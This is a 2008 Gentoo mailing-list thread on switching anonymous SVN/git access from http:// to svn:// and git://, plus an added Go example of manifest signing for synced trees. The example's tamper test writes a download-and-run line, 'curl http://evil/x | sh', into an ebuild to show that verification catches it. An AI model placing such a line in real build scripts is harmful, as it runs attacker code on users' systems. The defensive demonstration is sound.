On Friday 18 January 2008, Robin H. Johnson wrote:
> On Sat, Jan 19, 2008 at 12:26:44AM +0200, Alon Bar-Lev wrote:
> > On 1/18/08, Mike Frysinger <[EMAIL PROTECTED]> wrote:
> > > On Thursday 17 January 2008, Robin H. Johnson wrote:
> > > > anonvcs.gentoo.org: anoncvs, anonsvn, anongit
> > > > - Anonymous SVN is changing from http:// to svn:// [1]
> > > > overlays.gentoo.org [3]:
> > > > - Anonymous SVN is changing from http:// to svn://
> > >
> > > i'd point out that http:// syncing is usable from behind firewalls
> > > while svn:// is not ... while this does not affect me personally, it's
> > > something to keep in mind.
> > > -mike
> >
> > Just wanted to note this too... I am one of the affected ones...
> > I think that it is very important to have http, and even https, for
> > formal resources.
> > git://, svn://, rsync:// or ssh+X:// are inaccessible for a large
> > group of users.
>
> My core concern with the SVN http:// was the crappy performance it
> provided compared to svn://. The main rsync tree has never been
> available for iterative syncing via http://, just had tarball snapshots
> and deltas instead.
i'm not suggesting you *not* provide the proper svn:// and git:// ones. i'd always use those myself when possible (as performance is a ton better, as i've seen many times). i'm suggesting we provide both and tell people to use svn:// and git://, but if you're behind a stupid firewall, there is also http:// available.

> > Also, using non-secured protocols exposes users to man-in-the-middle
> > attacks.
>
> The existing http:// had this problem already, it's not a new one.
> git:// and svn:// do both have patches around adding support for adding
> TLS. This however just adds overhead, I really need to finish the
> tree-signing work I was doing, as that protects the content better (MITM
> is still possible on SSL without it, just a lot harder as an attacker
> has to deal with the SSL stream first).

using https:// to secure your data here is the wrong way to go. if you have a man-in-the-middle attacking you, they can do a lot more than inject crap into your syncs, some of which you wouldn't even notice. for the topic at hand, this topic does not matter i think.
-mike
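The tree-signing point Robin makes above (content protection that holds no matter which transport carried the bytes, versus TLS that only protects the stream) is easy to see in code. The following is an added example, not code from this thread, from Gentoo, or from the tree-signing work Robin mentions: it builds a manifest of every file in a synced tree, signs the manifest, and verifies the whole tree on the client side against a pinned public key. Ed25519 from the Go standard library stands in for whatever signature scheme the real work uses, the "FILE path size SHA256 hex" manifest line format is this example's own, and the tree contents, paths and key seed are constructed for the demonstration (paths are assumed to contain no whitespace).

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"sort"
	"strings"
)

// Tree is an in-memory stand-in for a synced checkout: repository path -> file contents.
type Tree map[string][]byte

// SampleTree is a constructed three-file tree; the paths and contents are made up.
func SampleTree() Tree {
	return Tree{
		"profiles/repo_name":          []byte("gentoo\n"),
		"sys-apps/foo/foo-1.0.ebuild": []byte("EAPI=1\nSRC_URI=\"mirror://foo/foo-1.0.tar.bz2\"\n"),
		"sys-apps/foo/metadata.xml":   []byte("<pkgmetadata/>\n"),
	}
}

// SampleKeys derives a fixed Ed25519 key pair from a constant seed so the example is
// deterministic. The seed is a throwaway test value; a real signing key stays offline.
func SampleKeys() (ed25519.PublicKey, ed25519.PrivateKey) {
	seed := []byte("0123456789abcdef0123456789abcdef") // 32 bytes, constructed
	priv := ed25519.NewKeyFromSeed(seed)
	return priv.Public().(ed25519.PublicKey), priv
}

// BuildManifest lists every file with its size and SHA-256, sorted by path, so the whole
// tree collapses into one signable byte string. The line format is invented for this example.
func BuildManifest(t Tree) []byte {
	paths := make([]string, 0, len(t))
	for p := range t {
		paths = append(paths, p)
	}
	sort.Strings(paths)
	var b strings.Builder
	for _, p := range paths {
		sum := sha256.Sum256(t[p])
		fmt.Fprintf(&b, "FILE %s %d SHA256 %s\n", p, len(t[p]), hex.EncodeToString(sum[:]))
	}
	return []byte(b.String())
}

// SignManifest runs on the publishing side, with the private key, before the tree goes out
// to mirrors. The signature travels alongside the manifest over any transport at all.
func SignManifest(priv ed25519.PrivateKey, manifest []byte) []byte {
	return ed25519.Sign(priv, manifest)
}

// VerifyTree runs on the client after a sync over http://, svn://, rsync:// or anything
// else. It trusts only the pinned public key: first the manifest signature, then every
// listed file's hash, then that nothing was added beyond what the manifest lists.
func VerifyTree(pub ed25519.PublicKey, manifest, sig []byte, synced Tree) error {
	if !ed25519.Verify(pub, manifest, sig) {
		return errors.New("manifest signature does not verify: manifest or signature replaced in transit")
	}
	want := make(map[string]string)
	for _, line := range strings.Split(strings.TrimSpace(string(manifest)), "\n") {
		if line == "" {
			continue
		}
		f := strings.Fields(line)
		if len(f) != 5 || f[0] != "FILE" || f[3] != "SHA256" {
			return fmt.Errorf("malformed manifest line %q", line)
		}
		want[f[1]] = f[4]
	}
	for p, hash := range want {
		data, ok := synced[p]
		if !ok {
			return fmt.Errorf("%s: listed in signed manifest but missing from sync", p)
		}
		sum := sha256.Sum256(data)
		if hex.EncodeToString(sum[:]) != hash {
			return fmt.Errorf("%s: content differs from signed manifest", p)
		}
	}
	for p := range synced {
		if _, ok := want[p]; !ok {
			return fmt.Errorf("%s: present in sync but not in signed manifest", p)
		}
	}
	return nil
}

func main() {
	pub, priv := SampleKeys()
	tree := SampleTree()
	manifest := BuildManifest(tree)
	sig := SignManifest(priv, manifest)
	fmt.Println("clean sync:", VerifyTree(pub, manifest, sig, tree))

	// An on-path attacker (or a hostile mirror) rewrites an ebuild during the sync.
	tampered := SampleTree()
	tampered["sys-apps/foo/foo-1.0.ebuild"] = []byte("EAPI=1\nsrc_install() { curl http://evil/x | sh; }\n")
	fmt.Println("modified ebuild:", VerifyTree(pub, manifest, sig, tampered))

	// The attacker also regenerates the manifest to match, but cannot forge the signature.
	fmt.Println("re-hashed manifest:", VerifyTree(pub, BuildManifest(tampered), sig, tampered))
}
```

The check never looks at how the bytes arrived: a plaintext http:// sync that passes VerifyTree is as good as an svn:// or https:// one, and an https:// sync from a compromised mirror still fails it. What TLS adds on top is privacy of the stream and the extra work Robin describes for an attacker, not integrity of the tree.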